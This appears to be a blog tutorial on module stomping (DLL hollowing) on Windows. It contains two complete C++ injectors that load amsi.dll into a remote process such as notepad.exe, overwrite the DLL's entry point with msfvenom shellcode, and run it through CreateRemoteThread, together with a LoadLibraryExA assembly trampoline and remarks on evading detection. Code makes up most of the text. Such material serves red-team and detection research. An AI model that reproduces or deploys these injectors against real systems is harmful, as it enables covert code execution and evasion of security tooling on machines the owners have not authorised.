Module stomping is a form of DLL injection. Rather than injecting our own DLL, however, we load a legitimate DLL into a remote process and then overwrite the DLL’s code. The benefit of this technique is that our shellcode will be executed from a region of backed memory (i.e., a memory region within the range of a loaded module). Module stomping is sometimes referred to as DLL hollowing.
There are a couple of ways to carry this out. First, let’s look at performing module stomping using LoadLibraryA.
LoadLibraryA Module Stomping
The following steps need to occur:
- Get a handle to the remote process using OpenProcess
- Allocate memory in the remote process with VirtualAllocEx, and write the path of the legitimate DLL we want to load into it using WriteProcessMemory
- Use CreateRemoteThread to execute LoadLibraryA, using a pointer to our DLL name as its parameter
- Retrieve the DLL entry point for the module we just loaded.
- Use WriteProcessMemory to overwrite the DLL entry point with our shellcode
- Use CreateRemoteThread again with the DLL entry point
The below code implements these steps.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 | #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <iostream> #include <TlHelp32.h> #include <Psapi.h> #include <tchar.h> using namespace std; DWORD_PTR GetRemoteDllLoadAddress( HANDLE hProcess, const TCHAR * dllName) { if (hProcess == NULL) { std::cerr << "Invalid process handle." << std::endl; return 0; } HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, GetProcessId(hProcess)); if (hSnapshot == INVALID_HANDLE_VALUE) { std::cerr << "Failed to create snapshot." << std::endl; return 0; } MODULEENTRY32 me32; me32.dwSize = sizeof (MODULEENTRY32); DWORD_PTR loadAddress = 0; if (Module32First(hSnapshot, &me32)) { do { if (_tcsicmp(me32.szModule, dllName) == 0) { loadAddress = ( DWORD_PTR )me32.modBaseAddr; break ; } } while (Module32Next(hSnapshot, &me32)); } CloseHandle(hSnapshot); return loadAddress; } DWORD_PTR GetRemoteDllEntryPoint( HANDLE hProcess, DWORD_PTR loadAddress) { if (hProcess == NULL || loadAddress == 0) { std::cerr << "Invalid process handle or load address." << std::endl; return 0; } // Read DOS header from remote process IMAGE_DOS_HEADER dosHeader; SIZE_T bytesRead; if (!ReadProcessMemory(hProcess, ( LPCVOID )loadAddress, &dosHeader, sizeof (IMAGE_DOS_HEADER), &bytesRead) || bytesRead != sizeof (IMAGE_DOS_HEADER)) { std::cerr << "Failed to read DOS header." 
<< std::endl; return 0; } // Validate DOS header if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { std::cerr << "Invalid DOS header." << std::endl; return 0; } // Read NT headers from remote process IMAGE_NT_HEADERS ntHeaders; if (!ReadProcessMemory(hProcess, ( LPCVOID )(loadAddress + dosHeader.e_lfanew), &ntHeaders, sizeof (IMAGE_NT_HEADERS), &bytesRead) || bytesRead != sizeof (IMAGE_NT_HEADERS)) { std::cerr << "Failed to read NT headers." << std::endl; return 0; } // Validate NT headers if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) { std::cerr << "Invalid NT headers." << std::endl; return 0; } // Calculate and return entry point address return ( DWORD_PTR )(loadAddress + ntHeaders.OptionalHeader.AddressOfEntryPoint); } int main( int argc, char * argv[]) { char sampleDLL[] = "C:\\windows\\system32\\amsi.dll" ; HANDLE process_handle; //Get a handle to our remote process process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD ( atoi (argv[1]))); // Allocate memory in the remote process LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); // Write our DLL name to the remote process WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof (sampleDLL), NULL); //Retrieve the memory address of LoadLibraryA function HMODULE k32_handle = GetModuleHandle( L"Kernel32" ); VOID * load_library = GetProcAddress(k32_handle, "LoadLibraryA" ); //Execute the DLL in a new remote thread HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)load_library, buffer, 0, NULL); std::cout << "DLL Injected! Press ENTER to execute\n" ; getchar (); const TCHAR * dllName = _T( "amsi.dll" ); // Specify the name of the DLL DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName); if (dllLoadAddress != 0) { std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl; } else { std::cerr << "Failed to find DLL load address." 
<< std::endl; } DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress); if (entryPointAddress != 0) { std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl; } else { std::cerr << "Failed to retrieve entry point address." << std::endl; } // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; WriteProcessMemory(process_handle, reinterpret_cast < LPVOID >(entryPointAddress), ( LPCVOID )shellcode, sizeof (shellcode), NULL); // execute shellcode from inside the benign DLL CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL); CloseHandle(process_handle); std::cout << "Execution complete\n" ; return 0; } |
It’s worth noting that the loaded DLL may have Control Flow Guard (CFG) enabled, which effectively prevents us from executing from arbitrary locations in the target DLL. However, the entry point will always be executable.
LoadLibraryExA Module Stomping
In the above example, we use LoadLibraryA. This does work; however, every time the DLL is loaded or unloaded, our code will execute. This may not be ideal and may lead to instability in the target process. To get around this, we can use LoadLibraryExA.
1 2 3 4 5 | HMODULE LoadLibraryExA( [in] LPCSTR lpLibFileName, HANDLE hFile, [in] DWORD dwFlags ); |
The dwFlags option supports the value DONT_RESOLVE_DLL_REFERENCES, which appears to do what we want:
If this value is used, and the executable module is a DLL, the system does not call DllMain for process and thread initialization and termination. Also, the system does not load additional executable modules that are referenced by the specified module.
https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa
The problem with using LoadLibraryExA is that CreateRemoteThread only allows us to pass a single argument to the thread start routine, whereas LoadLibraryExA takes three. To work around this, the following approach is taken:
- Look up the address of LoadLibraryExA to use in the remote process.
- Allocate some memory in the remote process, and write an ASM stub that sets the additional function parameters we require
- Call CreateRemoteThread, with a pointer to our ASM stub.
Our ASM stub will look something like this:
1 2 3 4 | movabs rax, 0x000000000000000 - Replaced with LoadLibraryExA Address mov r8, 0x1 - ARG2 xor rdx, rdx - ARG1 jmp rax |
When we call this stub using CreateRemoteThread, we can specify a single parameter (ARG0) that will end up in the RCX register. This will be a pointer to the DLL path string that we wrote into the remote process.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 | #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <iostream> #include <TlHelp32.h> #include <Psapi.h> #include <tchar.h> using namespace std; DWORD_PTR GetRemoteDllLoadAddress( HANDLE hProcess, const TCHAR * dllName) { if (hProcess == NULL) { std::cerr << "Invalid process handle." << std::endl; return 0; } HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, GetProcessId(hProcess)); if (hSnapshot == INVALID_HANDLE_VALUE) { std::cerr << "Failed to create snapshot." << std::endl; return 0; } MODULEENTRY32 me32; me32.dwSize = sizeof (MODULEENTRY32); DWORD_PTR loadAddress = 0; if (Module32First(hSnapshot, &me32)) { do { if (_tcsicmp(me32.szModule, dllName) == 0) { loadAddress = ( DWORD_PTR )me32.modBaseAddr; break ; } } while (Module32Next(hSnapshot, &me32)); } CloseHandle(hSnapshot); return loadAddress; } DWORD_PTR GetRemoteDllEntryPoint( HANDLE hProcess, DWORD_PTR loadAddress) { if (hProcess == NULL || loadAddress == 0) { std::cerr << "Invalid process handle or load address." 
<< std::endl; return 0; } // Read DOS header from remote process IMAGE_DOS_HEADER dosHeader; SIZE_T bytesRead; if (!ReadProcessMemory(hProcess, ( LPCVOID )loadAddress, &dosHeader, sizeof (IMAGE_DOS_HEADER), &bytesRead) || bytesRead != sizeof (IMAGE_DOS_HEADER)) { std::cerr << "Failed to read DOS header." << std::endl; return 0; } // Validate DOS header if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { std::cerr << "Invalid DOS header." << std::endl; return 0; } // Read NT headers from remote process IMAGE_NT_HEADERS ntHeaders; if (!ReadProcessMemory(hProcess, ( LPCVOID )(loadAddress + dosHeader.e_lfanew), &ntHeaders, sizeof (IMAGE_NT_HEADERS), &bytesRead) || bytesRead != sizeof (IMAGE_NT_HEADERS)) { std::cerr << "Failed to read NT headers." << std::endl; return 0; } // Validate NT headers if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) { std::cerr << "Invalid NT headers." << std::endl; return 0; } // Calculate and return entry point address return ( DWORD_PTR )(loadAddress + ntHeaders.OptionalHeader.AddressOfEntryPoint); } LPVOID loadlibrary_gadget( void * ptr_load_libraryex, HANDLE process_handle) { //Add the LoadLibraryExA instruction to our trampoline // 48 b8 00 00 00 00 00 movabs rax, 0x000000000000000 - LoadLibraryExA Address // 7 : 00 00 00 // a : 49 c7 c0 01 00 00 00 mov r8, 0x1 - ARG2 // 11 : 48 31 d2 xor rdx, rdx - ARG1 // 14 : ff e0 jmp rax uint8_t load_libary_ex_instructions[] = {0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x31, 0xD2, 0xFF, 0xE0}; memcpy (&load_libary_ex_instructions[2], &ptr_load_libraryex, sizeof (ptr_load_libraryex)); // Allocate memory in remote process and write to it LPVOID gadget_buffer = VirtualAllocEx(process_handle, NULL, sizeof (load_libary_ex_instructions), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(process_handle, gadget_buffer, load_libary_ex_instructions, sizeof (load_libary_ex_instructions), NULL); return gadget_buffer; } DWORD 
GetProcessIdByName( const TCHAR * processName) { PROCESSENTRY32 processEntry; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return 0; // Unable to create snapshot } processEntry.dwSize = sizeof (PROCESSENTRY32); if (!Process32First(hSnapshot, &processEntry)) { CloseHandle(hSnapshot); return 0; // Unable to get the first process } do { if (_tcsicmp(processEntry.szExeFile, processName) == 0) { CloseHandle(hSnapshot); return processEntry.th32ProcessID; // Found the process, return its PID } } while (Process32Next(hSnapshot, &processEntry)); CloseHandle(hSnapshot); return 0; // Process not found } int main( int argc, char * argv[]) { HANDLE process_handle; //Get a handle to our remote process const TCHAR * processName = _T( "notepad.exe" ); DWORD pid = GetProcessIdByName(processName); process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); // Allocate memory in the remote process char sampleDLL[] = "C:\\windows\\system32\\amsi.dll" ; LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (sampleDLL), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); // Write our DLL to the remote process WriteProcessMemory(process_handle, buffer, sampleDLL, sizeof (sampleDLL), NULL); //Retrieve the memory address of LoadLibraryA function HMODULE k32_handle = GetModuleHandle( L"Kernel32" ); VOID * load_library = GetProcAddress(k32_handle, "LoadLibraryExA" ); // Get a pointer to our LoadLibraryExA gadget std::cout << "LoadLibraryExA address " << ": 0x" << std::hex << load_library << std::endl; LPVOID gadget_buffer = loadlibrary_gadget(load_library, process_handle); std::cout << "Gadget buffer " << ": 0x" << std::hex << gadget_buffer << std::endl; HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)gadget_buffer, buffer, 0, NULL); std::cout << "DLL Injected! 
Press ENTER to execute\n" ; getchar (); const TCHAR * dllName = _T( "amsi.dll" ); // Specify the name of the DLL DWORD_PTR dllLoadAddress = GetRemoteDllLoadAddress(process_handle, dllName); if (dllLoadAddress != 0) { std::cout << "Load address of amsi.dll is " << ": 0x" << std::hex << dllLoadAddress << std::endl; } else { std::cerr << "Failed to find DLL load address." << std::endl; } DWORD_PTR entryPointAddress = GetRemoteDllEntryPoint(process_handle, dllLoadAddress); if (entryPointAddress != 0) { std::cout << "Entry point address of DLL in process " << ": 0x" << std::hex << entryPointAddress << std::endl; } else { std::cerr << "Failed to retrieve entry point address." << std::endl; } // msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; WriteProcessMemory(process_handle, 
reinterpret_cast < LPVOID >(entryPointAddress), ( LPCVOID )shellcode, sizeof (shellcode), NULL); // execute shellcode from inside the benign DLL CreateRemoteThread(process_handle, NULL, 0, (PTHREAD_START_ROUTINE)entryPointAddress, NULL, 0, NULL); CloseHandle(process_handle); std::cout << "Execution complete\n" ; return 0; } |
In Conclusion
LoadLibraryExA module stomping does prevent the issue of the payload being executed multiple times; however, it requires using VirtualAllocEx to allocate unbacked executable memory in the remote process, which in itself may be suspicious. An alternative may be implementing a mutex in the payload to ensure only one instance executes at a time.